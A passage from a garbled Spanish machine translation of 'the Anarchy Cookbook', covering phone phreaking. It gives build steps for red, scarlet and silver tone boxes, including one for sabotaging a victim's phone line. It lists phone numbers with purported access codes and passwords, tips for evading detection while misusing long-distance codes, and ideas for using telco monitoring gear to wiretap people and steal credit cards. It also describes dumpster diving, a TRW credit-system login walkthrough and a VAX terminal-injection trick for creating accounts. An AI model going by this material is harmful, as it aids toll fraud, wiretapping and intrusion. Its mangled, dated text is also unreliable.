El buen funcionamiento del Perla Caja:Es posible que desee obtener algunas calcomanías de transferencia en seco en Radio Shack para hacer este trabajo mucho más fácil. Además, algunos mandos para las partes superiores de los potenciómetros pueden ser útiles también. Utilice las etiquetas para calibrar los mandos. R1 es el mando para el lugar de las unidades, R2 es el lugar de las decenas, R3 si el lugar de las centenas y R4 es el lugar de los millares. S1 es para la producción de los todos los tonos y S2 es para poder.

1. Encienda la alimentación y ajustar las perillas para el tono deseado.(Ejemplo: Para 2600 Hz-R1 = 0: R2 = 0: R3 = 6: R4 = 2)

Page 115: 106652012 the Anarchy Cookbook 2000 Es

2. Pulse el interruptor de botón y ¡listo! Usted tiene el tono. Si usted no tiene un tono de volver a comprobar todas las conexiones y esquemáticos.

99. El archivo Phreak por The Jolly Roger

202 282 3010 UNIV. DE D.C.202 553 0229 PENTÁGONO T.A.C.202 635 5710 CATÓLICA UNIV. DE AMERICA202 893 0330 DATOS DE DEFENSA DE LA RED202 893 0331 DATOS DE DEFENSA DE LA RED202 965 2900 WATERGATE203 771 4930 Telephone Pioneers206 641 2381 LA VOZ DE CHESTER212 526 1111 NUEVA YORK LINE FEED212 557 4455 SEXO Hot Line212 799 5017 ABC NY LINE FEED212 934 9090 DIAL-AN-IDIOTA212 976 2727 P.D.A.212 986 1660 Stock Quotes213 541 2462 informes de la bolsa213 547 6801 MARINA BUQUES INFO213 576 6061 ""213 664 3321 NOTICIAS PARA LOS CIEGOS301 393 1000 ""301 667 4280 INFORMACIÓN DE LA LOTERÍA312 939 1600 ""404 221 5519 DE LA COMISIÓN NUCLEAR408 248 8818 1st National Bank415 642 2160 TERREMOTO DE INFORME505 883 6828 ""512 472 2181 ""512 472 4263 GRABACIÓN WEIRD512 472 9833 ""512 472 9941 25 CENTAVOS INSERT512 472 9941 REGISTRO ESPECIAL512 870 2345 ""516 794 1707 ""619 748 0002 LOOP LÍNEA619 0003 748 ""703 331 0057 MCI (5 dígitos)703 334 6831 WASH. PUBLICAR703 354 8723 OBLIGAR INC703 737 2051 Metrophone (6 dígitos)703 835 0500 VALNET (5 dígitos)703 861 7000 SPRINT (6/8 dígitos)703 861 9181 SPRINT (6/8 dígitos)714 974 4020 CA. UNIDAD CENTRAL716 475 1072 N.Y. diciembre-SYSTEM800 222 0555 INSTITUTO DE INVESTIGACIONES800 223 3312 CITIBANK800 227 5576 Eastern Airlines800 248 0151 de la Casa Blanca800 321 1424 PLANES DE VUELO800 323 3026 TEL-TEC (6 GIGITS)800 323 4756 MOTOROLA DITELL800 323 7751 MCI MAINFRAME800 325 4112 EASYLINK800 325 6397 Para su información800 344 4000 MSG SISTEMA800 368 6900 SKYLINE ORDEN800 424 9090 de Ronald Reagan PRENSA800 424 9096 INTERRUPTOR DE CASA BLANCA

Page 116: 106652012 the Anarchy Cookbook 2000 Es

800 438 9428 ITT CIUDAD LLAME AL CAMBIO800 521 2255 AutoNet800 521 8400 TravelNet (8 dígitos)800 526 3714 RCA MAINFRAME800 527 1800 TYMNET800 621 3026 operador especial800 621 3028 ""800 621 3030 ""800 621 3035 ""800 631 1146 VOZ STAT800 821 2121 CAMPANA TELEMARKETING800 828 6321 XEROX $800 858 9313 RECORD-A-VOZ800 882 1061 AT & T LOS PRECIOS DE ACCIONES914 997 1277 ""916 445 2864 JERRY BROWNN / A SPRINT 950 1000N / D 950 1022 Execunet MCIN / D 950 1033 teléfono de EE.UU.N / D 950 1044 ALLNET (6 dígitos)N / A LEXITEL 950 1066N / A HORIZONTE 950 1088 (6 dígitos)

-----------------------------------TELÉFONO | DESCRIPCIÓN / CODE-----------------------------------201-643-2227 | Códigos: 235199, 235022 y 121270 |800-325-4112 | WESTERN UNION |800-547-1784 | Códigos: 101111, 350009 y 350008 |800-424-9098 | Llamada Gratuita BLANCO SA. |800-424-9099 | Defensa Hot Line |202-965-2900 | WATERGATE |800-368-5693 | Howard Baker LÍNEA DIRECTA |202-456-7639 | Reagan SECRETARIO |202-545-6706 | PENTÁGONO |202-694-0004 | MODEM PENTÁGONO |201-932-3371 | REUTERS |800-325-2091 | Contraseña: JUEGOS |800-228-1111 | AMERICAN EXPRESS |617-258-8313 | Después de conectar Pulse CTRL-C |800-323-7751 | Contraseña: Registrarse |800-322-1415 | Códigos: 266891, 411266 y 836566 (utilizado por sysop)

Los siguientes 800 # 's se han recogido, sin embargo no hay códigos se han encontrado todavía! si cortar cualquier favor hágamelo saber ...-----------------------------------teléfono # | códigos:-----------------------------------

Page 117: 106652012 the Anarchy Cookbook 2000 Es

800-321-3344 |??????800-323-3027 |??????800-323-3208 |??????800-323-3209 |??????800-325-7222 |??????800-327-9895 |??????800-327-9136 |??????800-343-1844 |??????800-547-1784 |??????800-547-6754 |??????800-654-8494 |??????800-682-4000 |??????800-858-9000 |??????

800 números con los transportistas.800-323-9007800-323-9066800-323-9073800-321-4600800-547-1784

Números 1-800 del gobierno.800-321-1082:MARINA DE GUERRA FINANZAS CENTRO.800-424-5201: BANCO IMPORT EXPORT.800-523-0677: Alcohol, Tabaco y.800-532-1556: información que se aporte CNTR1-1082:MARINA DE GUERRA FINANZAS CENTRO.800-424-5201: BANCO IMPORT EXPORT.800-523-0677: Alcohol, Tabaco y.800-532-1556: CNTR alimentados con información.800-325-4072: COMBATIR EL SERVICIO Y LOS BRAZOS.800-325-4095: PODER COMBATIR EL APOYO.800-325-4890: ROPD COMBAT ARMS USAR.800-432-3960: SEGURIDAD SOCIAL.800-426-5996: el astillero naval de Puget.Directorio de números de llamada gratuita.800-432-3960: SEGURIDAD SOCIAL.800-426-5996: el astillero naval de Puget.Directorio de números de llamada gratuita.301-234-0100:BALTIMORE ELÉCTRICA.202-456-1414: CASA BLANCA.202-545-6706: Pentágono.202-343-1100: EPA.714-891-1267: Dial-A-Geek.714-897-5511: OPORTUNO.213-571-6523: mensajes satánicos.213-664-7664: DIAL-A-Song.405-843-7396: MÚSICA SYNTHACER.213-765-1000: LISTA de los muchos números.512-472-4263: raro.512-472-9941: INSERT 25.203-771-3930: Pioneros.213-254-4914: Dial-A-ateo.212-586-0897: DIRTY.213-840-3971: HOROWIERD203-771-3930: PIONEROS471-9420,345-9721,836-8962836-3298,323-4139,836-5698471-9440,471-9440,471-6952476-6040,327-9772,471-9480800-325-1693,800-325-4113800-521-8400: ACTIVADO POR VOZ213-992-8282: NÚMERO DE ACCESO METROFONE

Page 118: 106652012 the Anarchy Cookbook 2000 Es

617-738-5051:PIRATA PUERTO617-720-3600: TIMECOR # 2301-344-9156: N.A.S.A CONTRASEÑA: Gaset318-233-6289: UNIVERSIDAD LOUISIANA213-822-2112:213-822-3356213-822-1924:213-822 3127213-449-4040:TECH CENTRO213-937-3580: TELENET1-800-842-87811-800-368-56761-800-345-3878212-331-1433213-892-7211213-626-2400713-237-1822713-224-6098713-225-1053713-224-9417818-992-82821-800-521-8400

Después de introducir el código de sprint, y, C + número de destino. A continuación, introduzca laNúmero: ô205 # 977 # 22 ", y el indicador principal de Sprint se desactivará.

215-561-3199/SPRINT LARGA DISTANCIA202-456-1414/WHITE CASA011-441-930-4832/QUEEN ELIZABETH916-445-2864/JERRY BROWNPRENSA 800-424-9090/RONALD REAGAN212-799-5017/ABC NUEVA YORK LINE FEED800-882-1061/AT & T LOS PRECIOS DE ACCIONESCotizaciones 212-986-1660/STOCKEFECTOS 213-935-1111/WIERD!512-472-4263/WIERD GRABACIÓN212-976-2727/P.D.A.619-748-0002/FONE CO LÍNEAS DE ENSAYO900-410-6272/SPACE SHUTTLE COMM.TELÉFONO 201-221-6397/AMERICAN215-466-6680/BELL DE PENNSYLVANIA202-347-0999/CHESAPEAKE TELÉFONOTELÉFONO 213-829-0111/GENERAL808-533-4426/HAWAIIAN TELÉFONO312-368-8000/ILLINOIS CAMPANA TELÉFONO317-265-8611/INDIANA CAMPANA313-223-7233/MICHIGAN CAMPANA313-223-7223/NEVADA CAMPANA207-955-1111/NEW INGLATERRA TELÉFONO201-483-3800/NEW JERSEY CAMPANA212-395-2200 /NUEVA YORK TELÉFONO515-243-0890/NORTHWESTERN CAMPANA216-822-6980/OHIO CAMPANA206-345-2900/PACIFIC NOROESTE CAMPANA213-621-4141/PACIFIC TELÉFONO205-321-2222/SOUTH CENTRAL CAMPANA404-391-2490/SOUTHERN CAMPANA203-771-4920/SOUTHERN NUEVA INGLATERRA314-247-5511/SOUTHWESTERN CAMPANA414-678-3511/WISCONSIN TELÉFONO800-327-6713/UNKNOWN ORIGEN303-232-8555/HP3000315-423-1313/DEC-10313-577-0260/WAYNE ESTADO

Page 119: 106652012 the Anarchy Cookbook 2000 Es

512-474-5011/AUSTIN COMPUTADORAS516-567-8013/LYRICS tiempo compartido212-369-5114/RSTS/E415-327-5220/NECCOMPUTADORAS 713-795-1200/SHELL518-471-8111/CNA DE NY800-327-6761/AUTONET800-228-1111/VISA DE CREDITO713-483-2700/NASUA213-383-1115/COSMOS408-280-1901/TRW404-885-3460/SEARS DE CREDITO414-289-9988/AARDVARK SOFTWARE919-852-1482/ANDROMEDA INCORPORATED213-985-2922/ARTSCI714-627-9887/ASTAR INTERNACIONALSIMULACIONES 415-964-8021/AUTOMATEDCREACIONES 503-345-3043/AVANT GARDE415-456-6424/BRODERBUND SOFTWARE415-658-8141/BUDGE EMPRESA714-755-5392/CAVALIER ORDENADORSISTEMAS DE DATOS 801-753-6990/COMPUTER213-701-5161/DATASOFT INC213-366-7160/DATAMOST716-442-8960/DYNACOMP213-346-6783/EDU-WARE800-631-0856/HAYDENSISTEMAS DE SOFTWARE 919-983-1990/MED312-433-7550/MICRO LAB206-454-1315/MICROSOFT301-659-7212/MUSE SOFTWARE209-683-6858/ON-LINE SISTEMAS203-661-8799/PROGRAM DISEÑO (PDI)213-344-6599/QUALITY SOFTWARESOFTWARE 303-925-9293/SENTIENT702-647-2673/SIERRA SOFTWARE916-920-1939/SIRIUS SOFTWARE215-393-2640/SIR-TECH415-962-8911/SOFTWARE EDITORIALESSIMULACIONES 415-964-1353/STRATEGIC217-359-8482/SUBLOGIC COM.SOFTWARE 206-226-3216/SYNERGISTIC

Aquí hay algunos consejos sobre cómo no quedar atrapados cuando se utiliza MCI u otros servicios:

1. Trate de no utilizarlas para una voz a las llamadas personales. Trate de utilizar para las llamadas de computadora. He aquí por qué:

MCI y los otros servicios no se puede rastrear las llamadas que entran a través de las líneas, sólo puede controlar. Pueden escuchar sus llamadas y de eso, se puede conseguir su nombre y otra información de la conversación. También puede llamar al número que llama y pregunte a su amigo de algunas de las preguntas. Si se llama a los terminales y BBS, entonces es mucho más difícil obtener información. Por un lado, la mayoría de los operadores del sistema no va a dar a estos tipos que llaman a cualquier información en absoluto, o van a actuar como tonta, porque ellos mismos Phreak!

2. Tenga cuidado al usar la caja de colores! Son fáciles de encontrar!!

3. Trate de encontrar un número de onda sinusoidal. A continuación, utilice un deterioro cognitivo leve o de otro servicio para llamar. Usted escuchará un tono

Page 120: 106652012 the Anarchy Cookbook 2000 Es

que sube y baja. Si el tono justo para, a continuación, que el código está siendo monitoreado y usted debe tener cuidado al usarlo.

Si son atrapados, entonces, si usted piensa que puede, trate de escabullirse de ella. He oído muchas historias acerca de personas que se han declarado con los chicos de MCI y se han dejado fuera. Usted recibirá una llamada de un hombre que ha estado supervisando. Acta de Niza. El acto como usted sabe ahora es malo hacer este tipo de cosas ..... simplemente suena como que lo siente por lo que hiciste. (Si usted recibe una llamada, es probable que sea un poco de pena!) De lo contrario, es muy peligroso!!! (Muy con una V mayúscula!)

Planes 100.Red caja por el Jolly Roger

Red de boxeo es la simulación de los tonos producidos por teléfonos públicos de pago, cuando se le cae su dinero pulg Los tonos son tonos de 2200Hz 1700Hz + un níquel es una señal sonora durante 66 milisegundos. Una moneda de diez centavos es de 2 tonos, cada uno de 66 milisegundos con una pausa de 66 milisegundos entre pitidos. Una cuarta parte es de 5 pitidos, cada 33 milisegundos, con una pausa de 33 milisegundos entre pitidos.

Hay dos métodos comúnmente utilizados siendo utilizados por Phreaks para hacer llamadas gratuitas.

1. Un electrónica dispositivo de mano que está hecha de un par de puente de Wien osciladores con la temporización controlada por 555 chips de temporización.

2. Una grabación de los sonidos producidos por una computadora en casa. Uno de los mejores ordenadores para utilizar sería un Atari ST. Es uno de los equipos más fáciles de usar debido a los tonos rojos de caja puede ser producido en base con sólo unos 5 estados.

101.RemObS de The Jolly Roger

Algunos de ustedes pueden haber oído hablar de dispositivos llamados Remobs que significa sistema de observación remota. Estos dispositivos permiten que supuestamente los empleados autorizados de teléfono para marcar en ellos desde cualquier lugar, y luego usando un fone por tonos común, aprovechar la línea de un cliente en un especial modo de sólo recibir. [El circuito de la boquilla se desactiva, lo que permite la observación en completo silencio desde cualquier fone en el mundo (escuchas telefónicas sin orden judicial en contra de la ley)]

¿Cómo funciona RemobsMarque el número de una unidad de Remob. Campana Se rumorea que los puso en los 555 intercambios de información, troncos updates especiales de acceso [inalcanzable excepto a través de caja azul]. A continuación, el tono será escuchado por aproximadamente 2 segundos y luego silencio. Usted debe ingresar (En DTMF) una 2 a 5 código de acceso de un dígito, mientras que la celebración de cada dígito por lo menos durante 1 segundo. Si el código no es ingresado dentro de los 5 o 6 segundos, el Remob se liberará y se debe marcar de nuevo. Si el código es supuestamente otro tono será escuchado. Un número de siete dígitos fone de abonado se puede introducir [El Remob sólo puede manejar algunos de los intercambios de los que están precableados, por lo general, una máquina no puede controlar todo un Plan Nacional de Acción]. El Remob se conectará con la línea de suscriptores. El oyente escuchará el tono de nivel de ralentí bajo, siempre y cuando el partido es monitoreado en el gancho. Como los diales del partido monitoreados [ROTARY] o DTMF, el oyente escuchará [Y Grabar] el número marcado está. A continuación, toda la conversación, enlace de datos, lo que está ocurriendo, todo sin ser detectado. No hay ninguna caja de corriente que puede detectar la observación Remob, ya que se está haciendo con el equipo telefónico que hace la conexión. Cuando el oyente está terminado el seguimiento de ese cliente en particular, él las llaves del último dígito del código de acceso que le desconecta de la línea de seguimiento y volver al tono de modo que él puede introducir otro número de 7 dígitos fone. Cuando el oyente está totalmente terminado con la Remob, él las claves de un solo "desconecte dígitos" que le

Page 121: 106652012 the Anarchy Cookbook 2000 Es

desconecta de la Remob para que el dispositivo puede restablecer y estar listo para otra persona que llama.

Historia de RemobsCampana ha mantenido la existencia de la clave Remobs muy bajo. Sólo en 1974, Campana reconoció que existía Remobs. El dispositivo se hizo público por primera vez durante las audiencias sobre "Prácticas de monitoreo telefónico por parte de las agencias federales" antes de un subcomité de operaciones del gobierno. Cámara de Representantes, Noventa y tres Congreso, junio de 1974. Desde entonces se ha indicado por Campana que los dispositivos Remob se utilizan exclusivamente para el seguimiento de Campana empleados, tales como operadores, operadores de información, etc, para mantener las pestañas en su desempeño. [Suuureee, eran estúpidos]

Los posibles usos de Remobs Los posibles usos de Remobs son casi tan interminable como los usos de la propia línea creada fone. Imagínese la capacidad de controlar el banco, etc líneas, justo al lado de la parte superior de mi cabeza se me ocurre una de estas aplicaciones:

Monitoreo de Datos de:• TRW• Oficina Nacional de Crédito.• AT & T Cosmos.• Instituciones bancarias.• CompuServe y otras redes.

Control de Voz:• Instituciones bancarias.• Las empresas de pedidos por correo.• Campana Telefonear a sí mismos.• Cualquier lugar el manejo de información sensible o importante.• Cualquier persona que no le guste.

Con un solo Remob, alguien podría obtener cientos de tarjetas de crédito, averigüe quién estaba de vacaciones, obtener contraseñas de CompuServe por docenas, desconecte Fones los pueblos, hacer los controles de crédito, obtener información sobre todo lo que es posible que quieran conocer. Estoy seguro de que brillante puede ver el valor de un teléfono y un entusiasta aficionado de las telecomunicaciones de poner sus manos en un Remobs escogidas. <grin>

PrecauciónSi algún lector debe descubrir un Remob durante sus excursiones de exploración (o ella), por favor, tenga en cuenta las leyes federales muy estrictos sobre el uso no autorizado de las escuchas telefónicas y la privada Campana propiedad.

Planes 102.Scarlet caja por el Jolly Roger

El propósito de un cuadro escarlata es crear una conexión muy mala, se puede utilizar para bloquear un BBS o simplemente hacer la vida imposible a los que tratan de vengarse.

Materiales:• 2 pinzas de cocodrilo• 3 hilos pulgada, o un resistente (cable plano va a crear mayor cantidad de

estática) (Opositor a disminuir la cantidad de electricidad estática en proporción a la resistente que está utilizando)

1. Encontrar la caja del teléfono en su casa a las víctimas, y el pop de la cubierta.2. Encuentra las dos puntas que la línea de teléfono que desea a la caja están

conectados.3. Enganche a sus pinzas de cocodrilo a su (cable / resistente).

Page 122: 106652012 the Anarchy Cookbook 2000 Es

4. Buscar el diente media baja y quitar todos los cables conectados a él, creo que esto deshabilita el suelo y la llamada en espera y cosas así.

5. Desde aquí, tomar una de las pinzas de cocodrilo y adjuntarlo a la parte superior la mayoría de puntas, y tomar la otra y adjuntarlo a la clavija de conexión media más baja.

6. Ahora a poner la cubierta de la caja y quitar!

** # # # # # # # # ** ** # # # # # # ** # # # # # # # # / # # # # # # / # # # # # # # # / / / / / / / / ** / ** ** ** ** **

(**) = Dientes **(/) = (Cable / resistente)(# #) = Alguna mierda de teléfono

103.Silver Caja de los planes del Jolly Roger

Introducción:Primero un poco de Trivia del teléfono. Un teclado de teléfono estándar tiene 12 botones. Estos botones, cuando se empuja, producir una combinación de dos tonos. Estos tonos representan la fila y la columna de la tecla que están presionando.

1 1 1 2 3 4 0 3 7 9 6 7 697 (1) (2) (3) 770 (4) (5) (6) 851 (7) (8) (9) 941 (*) (0) (#)Así (1) produce un tono de 697 1209, (2) produce un tono de 697 1336, etc

Función:Lo que la caja de plata que hace es simplemente crea otra columna de botones, con el nuevo tono de 1633. Estos botones se denominan A, B, C y D.

Utilidad:Cualquiera que sepa algo de phreaking debe saber que en los viejos tiempos de phreaking, phreaks utiliza hardware para divertirse en lugar de Sprint de otras personas y de los códigos de MCI. El más famoso (y útil) fue el buen ol 'Blue Box. Sin embargo, Ma Bell decidió contraatacar y ahora la mayoría de los sistemas de telefonía tienen la protección contra la emisión de las cajas de tono. Esto hace que el boxeo casi inútil en la mayoría de las áreas de la Estados Unidos (Es decir, aquellas áreas con travesaño o paso a paso). Si usted vive en o cerca de una ciudad de buen tamaño, a continuación, el sistema telefónico es, probablemente, hasta al día (SEE) y la caja (y

Page 123: 106652012 the Anarchy Cookbook 2000 Es

la mayoría de los demás) será inútil. Sin embargo, si usted vive en el medio de la nada (sin ánimo de ofender), es posible encontrar un uso para este y otros cuadros.

Materiales:• Un pie de cable azul• Un pie de cable gris• Un pie de cable Brown• Un pequeño interruptor de SPDT (*)• 1 Estándar Ma Campana Teléfono

(*) SPDT = Polo Individual / Doble saque de banda

Herramientas:• 1 Soldador• Una mente con un destornillador

Procedimiento:1. Afloje los dos tornillos en la parte inferior del teléfono y tomar la caja fuera.2. Soltar los tornillos en el lado del teclado y quitar el teclado del soporte de

montaje.3. Retire la tapa de plástico del teclado.4. Gire el teclado de manera que * 0 # está dirigida hacia usted. Gire el teclado más.

Usted verá un montón de cables, contactos, dos bobinas negras, etc5. Mira la bobina de la izquierda. Se dispondrá de cinco (5) Contactos de soldadura

frente a usted. Suelde el cable gris al Polo Contacto cuarto desde la izquierda.6. Suelde el otro extremo del cable gris al poste izquierdo del interruptor SPDT.7. Encuentra las tres (3) contactos dorados en el borde inferior del teclado. En el

contacto de la izquierda, con cuidado separar los dos conectores de tocar (que están soldadas entre sí) y las separará.

8. Suelde el cable marrón al contacto más alejado de usted, y soldar el otro extremo al poste derecho del interruptor SPDT.

9. Suelde el cable azul al contacto más cercano, y el otro extremo al polo central del interruptor SPDT.

10. Ponga el teléfono de nuevo juntos.

Usando la caja de plata:Lo que acabamos de hacer se ha instalado un interruptor que va a cambiar el # 369 de la columna en una columna de ABCD. Por ejemplo, para marcar una 'B', cambia a tonos de caja de plata y pulse '6 '. Nadie está seguro de los usos A, B y C. Sin embargo, en una zona con un sistema de teléfono antiguo, el botón 'D' tiene un efecto interesante. Asistencia de directorio telefónico y mantenga pulsada la tecla 'D'. El teléfono sonará, y usted debe obtener un tono de pulsación. Si usted recibe un operador de cabreado, que tiene un sistema telefónico más reciente de las defensas contra las cajas de plata. En el tono de pulsación, llamar a un 6 o 7. Estos son los extremos del lazo.

104.Campana Ensuciar por The Jolly Roger

La Compañía de teléfono se van a los extremos en ocasiones. De hecho, a menos que usted realmente sabe lo que puede esperar de ellos, se va a sorprender a los diablos de que con sus "tarifas publicadas". Recientemente, una situación fue traído a mi atención que hasta entonces había sido totalmente inconsciente de, al menos mencionar, tenía alguna duda sobre la. Se trataba de basura! El co teléfono. se va tan lejos como para perseguir a cualquiera que hurga a través de su basura y ayuda a sí mismo hasta cierto

Por supuesto, tienen sus razones para esto, y sin lugar a dudas beneficios de tal acción. Pero, ¿por qué debería ser tan exigente con la basura? La respuesta pronto me quedó claro: esos enormes recipientes metálicos se llenan con más de desperdicios de comida vieja y se niegan ... A pesar de que es el Pacífico Tele. la política de reciclar productos de papel de desecho, a veces los empleados no pasar por alto esta operación sagrada, cuando la clasificación de la basura. Así de alto secreto telefónico

Page 124: 106652012 the Anarchy Cookbook 2000 Es

confidencial registros Co. ir a los contenedores de basura en lugar de las trituradoras de papel. Desde que se actualiza constantemente con los "memorandos de la empresa, y se suministra con amplio material de referencia, el co Teléfono. Continuamente debe disponer de los materiales obsoletos. Algunas empresas de telefonía se suministran cada año con la completa" Prácticas del sistema "guía. Esta publicación es una biblioteca de más de 40 pies de largo de material de referencia sobre todo lo relacionado con los teléfonos. A medida que la nueva edición llega cada año, la versión anterior de "Prácticas del sistema", también debe ser eliminado.

Que muy pronto descubrió que algunos phreakers telefónicos locales estaban recibiendo su material. Se arrastran en los contenedores de basura y eliminar los elementos seleccionados que son de particular interés para ellos y sus compañeros de phreaks. Un teléfono Phreak en el Los Ángeles zona se ha salvado de la completa edición 1972 de "prácticas del sistema de Bell". Es tan grande y estaba fuera de servicio (las carpetas se había retirado) que le tomó más de un año para ordenar y crear suficientes estanterías para que en su garaje.

Gran parte de este "Top Secret" la información es tan secreto que la mayoría de las compañías telefónicas no tienen idea de lo que está en sus archivos. Ellos tienen sus manos llenas simplemente reemplazar todo lo que cada vez que un cambio en la redacción requiere una nueva revisión. Parece que perder más el papel que pueden leer!

Le tomó bastante tiempo para que Hollywood Cal gerente de tráfico de averiguar cómo todos los phreakers telefónicos locales constantemente descubierto los números de prueba switchroom.

Cada vez que alguien quería usar el testboard, se encontraron con los phreaks de teléfono locales en las líneas que hablan a todos los puntos de todo el mundo. Llegó un punto en el que los aficionados a la basura locales sabían más acerca de las operaciones de la oficina que los propios empleados. Una Phreak fue tan lejos como para llamar y decirle a un guardagujas lo que su tarea diaria siguiente sería. Esto, sin embargo, resultó ser demasiado. El guardavías remontar la llamada y un phreaker se le negó la herramienta de su comercio.

En otro incidente más divertido, un compañero de Phreak fue hurgando en la basura cuando se enteró de que alguien se acercaba. Apretó contra el lado de la caja y en silencio, esperó a que los buenos por venir. Se puede imaginar su sorpresa cuando la basura de la cafetería se posó en su cabeza. La mayoría de la gente a encontrar la mejor noche para el control de sus montones de basura locales Telco. La única cosa necesaria es una linterna y, en el caso mencionado más arriba, posiblemente una capa de lluvia. Una palabra de advertencia, antes de salir y sumergirse en el montón de basura. Probablemente es ilegal, pero no importa donde usted vive, usted seguramente no tendrá la policía local para sostener la linterna para usted.

105.Canadian WATS Agenda de The Jolly Roger

800-227-4004 ROLM Collagen Corp.800-227-8933 ROLM Collagen Corp.800-268-4500 Correo de Voz800-268-4501 ROLM Texaco800-268-4505 Correo de Voz800-268-6364 Nacional de Datos de Crédito800-268-7800 Correo de Voz800-268-7808 Correo de Voz800-328-9632 Correo de Voz800-387-2097 Correo de Voz800-387-2098 Correo de Voz800-387-8803 ROLM Canadian Tire800-387-8861 ROLM Canadian Tire800-387-8862 ROLM Canadian Tire800-387-8863 ROLM Canadian Tire800-387-8864 ROLM Canadian Tire

Page 125: 106652012 the Anarchy Cookbook 2000 Es

800-387-8870 ROLM Halifax Vida800-387-8871 ROLM Halifax Vida800-387-9115 ASPEN Sunsweep800-387-9116 ASPEN Sunsweep800-387-9175 PBX [Hold Music = CHUM FM]800-387-9218 Voice Messenger800-387-9644 Carrier800-426-2638 Carrier800-524-2133 Álamo temblón800-663-5000 PBX / Correo de Voz [Hold Music = CFMI FM]800-663-5996 Correo de Voz (5 anillos)800-847-6181 Correo de Voz

NOTAS: Todos y cada uno de estos números está disponible para el 604 (Colombia Británica) Código de área. La mayoría están disponibles todo Canadá y algunos se encuentran en el Estados Unidos. Números designados ROLM han sido identificados como estar conectado a un sistema de ROLM PhoneMail. Números designado ASPEN están conectados a un ASPEN de voz del sistema de mensajes. Los números designados correo de voz no han sido identificados como de los equipos en uso en esa línea. Los números designados soporte son respondidas por un módem o un conjunto de datos. La mayoría de los sistemas de mensajes de voz y Rolms TODOS, sonido, como un contestador automático. Pulse 0 durante la grabación, cuando en un ROLM, * o # o DTMF sí en otros sistemas, y se impulsó hacia otro mundo ...

106.Hacking TRW por The Jolly Roger

Cuando se llama a TRW, el de acceso telefónico se identificará con el mensaje"TRW". A continuación, esperar a que escriba la parte posterior respuesta apropiada (por ejemplo, CTRL-G) Una vez que este se ha hecho, el sistema dirá "EDIFICIO DE CIRCUITO EN CURSO" Junto con algunos números. Después de esto, se borra la pantalla (CTRL L) seguido por un CTRL-Q. Después de que el sistema envía las teclas CTRL-Q, está listo para la solicitud. En primer lugar, escriba el identificador de 4 caracteres en el área geográfica de la cuenta ..

(Por ejemplo) TCA1 - a ciencia cierta California y suscriptores alrededores.TCA2 - Un segundo ternero. TRW del sistema.TNJ1 - Su base de datos de Nueva Jersey.TGA1 - Su base de datos de Georgia.

El usuario entonces envía un <CR> y luego en la siguiente línea, se debe escribir el 3 caracteres. Opción. La mayoría de las solicitudes utilizar la opción de estrategia en tiempo real. OPX, RTX, y algunos otros existen. (NOTA) TRW acepta una A, C o S como la 'X' en las opciones anteriores.) Entonces, finalmente, el usuario escribe su código de suscriptor de 7 dígitos. Él agrega a su contraseña de caracteres 3-4 después de ella. Parece que si te las arreglas para hacerse con una copia impresa de TRW (Ensuciar en Sears, Saks, ETC. O de obtener la impresión de crédito de ellos) su código de suscriptor será en él dejando sólo un carácter 04.03 p / w hasta usted.

Por ejemplo,(Llame a la Conexión telefónica)TRW tipos de sistemas, (ST) CTRL-G(Que se escribe, YT) Circuito de construcción en curso 1234(ST) CTRL + L CTRL-Q (TCA1 CYT) BTS 3000000AAA<CR> <CRTL-S> (YT]

Nota: Este sistema se encuentra en Half Duplex, paridad par, 7 bits por palabra y 2 bits de parada.

PRECAUCIÓN: Es un rumor muy subrayó que después de escribir la contraseña de TRW de tres (3) veces .. Se establece un número de identificación automática en el culo, así que ten cuidado. Y olvídate de que te dijo cómo hacerlo ..

Page 126: 106652012 the Anarchy Cookbook 2000 Es

107.Hacking VAX y Unix por The Jolly Roger

UNIX es una marca de AT & T (y usted sabe lo que eso significa)

En este artículo se discute el sistema UNIX que se ejecuta en los diversos sistemas VAX. Si usted está en otro sistema de tipo UNIX, algunos comandos pueden ser diferentes, pero ya que tiene licencia para la campana, no pueden hacer muchos cambios.

Hacking en un sistema Unix es muy difícil, y en este caso, le aconsejamos tener una fuente interna, si es posible. La razón es difícil de hackear un VAX es la siguiente: Muchos vax, después de llegar a un transportista de ellos, responde =>Inicio de sesión:Ellos te dan ninguna oportunidad de ver lo que el formato de nombre de usuario es. Los más utilizados son palabras sueltas, de 8 dígitos, por lo general el nombre de la persona. Hay una forma de evitar esto: La mayoría tienen un vax Cta. llamada "sugerir" para que la gente utiliza para hacer una sugerencia a la terminal de root del sistema. Esto se hace generalmente visto por el operador del sistema, pero a fines de que él es, probablemente, en su casa durmiendo o atornillar el cerebro de alguien fuera. Por lo tanto, puede escribir un programa para enviar a la vax este tipo de un mensaje:. El congelamiento de la pantalla (ctrl-S), pantalla clara (dependiendo del sistema), alrededor de 255 caracteres de basura, y luego un comando para crear una Cuenta de inicio de sesión, después de que limpiar la pantalla de nuevo, a continuación, descongelar el terminal. Lo que esto hace: Cuando el terminal se congela, se mantiene un tampón de lo que se envía. Bueno, el buffer es de unos 127 caracteres de longitud. por lo que se desborde con la basura, y luego le enviaremos una línea de comandos para crear una Cuenta. (Dependiendo del sistema). Después de esto se borra la memoria intermedia y la pantalla de nuevo, a continuación, desbloquear la terminal. Esta es una mala manera de hacerlo, y es mucho más agradable si usted acaba de enviar un comando a la terminal para apagar el sistema, o lo que sea que usted está después ... Siempre hay, * siempre * una Cta. llama la raíz, el más poderoso de cuenta. para estar en, ya que tiene todos los archivos de sistema en él. Si abrirse paso a ésta, entonces todo es fácil de aquí en adelante ... En el sistema UNIX, la tecla de abortar es la clave ctrl-D. Mira cuántas veces golpeó esto, ya que también es una manera de salir del sistema! Un poco sobre la arquitectura UNIX: El directorio raíz, llamado raíz, es donde reside el sistema. Después de esto vienen unos cuantos 'sub' directorios raíz, por lo general a las cosas de grupo (estadísticas aquí, cosas priv aquí, el registro de usuario de aquí ...). En virtud de esto viene el superusuario (el operador del sistema), y luego, finalmente, los usuarios normales. En todo lo que "Shell" de la red son tratados de la misma.

Con esto queremos decir: Usted puede acceder a un programa de la misma manera que acceder a un directorio de usuario, y así sucesivamente. La forma en que fue escrito el sistema Unix, todo, incluidos los usuarios, son los programas que pertenecen al directorio raíz. Aquellos de ustedes que cortó en la raíz, la sonrisa, ya que puede arruinar todo ... el nivel principal (nivel ejecutivo) del sistema en el sistema UNIX es el $, y si usted está en la raíz, usted tiene un # (superusuario ). Ok, algunos conceptos básicos para el sistema ... Para ver dónde estás, y qué caminos son activas en lo que respecta a su cuenta de usuario, a continuación, escriba

=> Pwd

Esto demuestra a su Cuenta. separados por una barra con otra ruta (acct.), posiblemente muchas veces. Para conectarse a través de otra ruta, o muchos caminos, tendría que escribir:

Usted => path1/path2/path3

